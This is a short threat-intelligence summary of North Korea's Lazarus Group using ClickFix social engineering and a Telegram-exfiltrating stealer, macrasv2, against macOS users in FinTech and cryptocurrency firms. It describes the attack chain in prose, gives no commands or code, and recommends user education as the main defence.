North Korea's Lazarus Group is deploying ClickFix social engineering attacks against macOS users, particularly targeting FinTech and cryptocurrency organizations and their leadership. Attackers contact victims via Telegram using compromised accounts, lure them into fake video calls, then trick them into running malicious commands to 'fix connection issues.' The attack chain downloads a macOS malware kit that installs a stealer called macrasv2, which harvests browser credentials, cookies, macOS Keychain data, and browser extension data before exfiltrating everything via Telegram and self-deleting. Despite the sophisticated delivery mechanism, the malware itself is poorly written with infinite loops, exposed Telegram bot tokens, and unauthenticated C2 endpoints. The primary defense recommended is user education about ClickFix techniques.
Sort: